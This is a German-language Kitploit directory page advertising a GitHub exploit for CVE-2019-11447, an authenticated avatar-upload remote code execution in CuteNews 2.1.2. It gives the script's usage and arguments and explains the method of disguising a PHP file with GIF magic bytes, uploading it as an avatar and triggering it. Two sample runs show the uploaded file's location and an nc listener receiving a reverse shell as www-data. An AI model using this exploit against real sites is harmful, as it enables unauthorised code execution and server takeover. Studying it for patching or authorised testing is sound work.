Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2019-11447_CuteNews-AvatarUploadRCE — Exploit-Code für CVE-2019-11447 alias CuteNews 2.1.2 Avatar upload RCE (Authenticated) | Kitploit
Tools/GitHubGitHub/coldfusionx/cve-2019-11447_cutenews-avataruploadrce
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubcoldfusionx/cve-2019-11447_cutenews-avataruploadrce

CVE-2019-11447_CuteNews-AvatarUploadRCE

Exploit-Code für CVE-2019-11447 alias CuteNews 2.1.2 Avatar upload RCE (Authenticated)

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Repository anzeigen
3vor 5 JahrenNoch nicht geprüft
Teilen

CVE-2019-11447 Exploit/PoC – CuteNews 2.1.2 Avatar-Upload RCE (authentifiziert)

Exploit-Code für CVE-2019-11447 aka CuteNews 2.1.2 Avatar-Upload RCE (authentifiziert)

Exploit-Links:

Erwartetes Ergebnis: Einloggen/Registrieren eines Kontos, Erstellen einer benutzerdefinierten PHP-Datei mit .gif-Magic-Bytes, Hochladen der Datei als Avatar und Auslösen derselben, um Remote Code Execution zu erreichen.

Nur für Bildungszwecke und Tests in Unternehmensumgebungen vorgesehen.

Dieser Exploit wurde unter Python 3.8.6 getestet.

Usage

root@kitploit:~
cfx:  ~/cutenews
→ ./exploit.py -h
usage: exploit.py [-h] [-l URL] [-u USERNAME] [-p PASSWORD] [-e EMAIL]

CuteNews 2.1.2 Avatar upload RCE (Authenticated) by ColdFusionX

optional arguments:
  -h, --help            show this help message and exit
  -l URL, --url URL     CuteNews URL (Example: http://127.0.0.1)
  -u USERNAME, --username USERNAME
                        Username to Login/Register
  -p PASSWORD, --password PASSWORD
                        Password to Login/Register
  -e EMAIL, --email EMAIL
                        Email to Login/Register

Exploit Usage :
./exploit.py -l http://127.0.0.1 -u cold -p fusion -e [email protected]
./exploit.py -l http://127.0.0.1 -u optimus -p prime -e [email protected]
[^] Select your PHP file -> rev.php
OR
[^] Select your PHP file -> ~/Downloads/rev.php
[^] Press y/n to trigger reverse shell -> y

Benutzereingaben :

Dieser Exploit erwartet vier Argumente für den Start:

  • -l : CuteNews-URL
  • -u : Benutzername für Login/Registrierung
  • -p : Passwort für Login/Registrierung
  • -e : E-Mail für Login/Registrierung

Zusätzlich erforderliche Benutzereingaben:

  • Select your PHP file -> Hier muss der Benutzer die PHP-Datei angeben, die hochgeladen werden soll. Es kann jede PHP-Datei sein, z.B. PHP-Info, PHP-Reverse-Shell. Wenn die PHP-Datei sich im selben Verzeichnis wie das Exploit befindet, kann der Benutzer einfach den Dateinamen angeben:

Beispiel: [^] Select your PHP file -> rev.php

Andernfalls muss der Benutzer den Pfad zur PHP-Datei angeben:

Beispiel: [^] Select your PHP file -> ~/Downloads/rev.php

  • Press y/n to trigger reverse shell -> Wenn der Benutzer eine PHP-Reverse-Shell hochgeladen hat, kann er wählen, ob die Reverse-Shell ausgelöst werden soll (y/n).

In jedem Fall gibt das Exploit den Speicherort der hochgeladenen Datei zur weiteren Verwendung aus.

Exploit-Ausführung

  • Szenario 1 > Einloggen mit vorhandenen Anmeldedaten und Erhalten einer Reverse Shell:
root@kitploit:~
cfx:  ~/cutenews
→ ./exploit.py -l http://127.0.0.1 -u optimus -p prime -e [email protected]
[+] CuteNews 2.1.2 Avatar Upload RCE exploit by ColdFusionX

[+] User exists ! Logged in Successfully
[^] Select your PHP file -> rev.php

[*] Adding Magic Byte to PHP file
[+] Upload Successful !!
[*] File location --> http://10.10.10.206/CuteNews/uploads/avatar_cold_cold.php

[^] Press y/n to trigger PHP file -> y
[*] Check listener for reverse shell
[*] Execution Completed

Shell

root@kitploit:~
cfx:  ~/cutenews
→ nc -lvnp 8020
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::8020
Ncat: Listening on 0.0.0.0:8020
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:32868.
Linux passage 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 03:06:04 up  4:15,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
prime    tty7     :0               22:50    4:15m  9.36s  0.69s /sbin/upstart --user
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ exit
  • Szenario 2 > Registrieren eines neuen Benutzers und Erhalten einer Reverse Shell:
root@kitploit:~
cfx:  ~/cutenews
→ ./exploit.py -l http://127.0.0.1 -u cold -p fusion -e [email protected]
[+] CuteNews 2.1.2 Avatar Upload RCE exploit by ColdFusionX

[+] Credentials cold:fusion Successfully Registered
[^] Select your PHP file -> rev.php

[*] Adding Magic Byte to PHP file
[+] Upload Successful !!
[*] File location --> http://127.0.0.1/CuteNews/uploads/avatar_cold_cold.php

[^] Press y/n to trigger PHP file -> y
[*] Check listener for reverse shell
[*] Execution Completed

Shell

root@kitploit:~
cfx:  ~/cutenews
→ nc -lvnp 8020
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::8020
Ncat: Listening on 0.0.0.0:8020
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:32868.
Linux passage 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 03:06:04 up  4:15,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
prime   tty7     :0               22:50    4:15m  9.36s  0.69s /sbin/upstart --user
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ exit

Referenz

  • https://nvd.nist.gov/vuln/detail/CVE-2019-11447
Tool herunterladen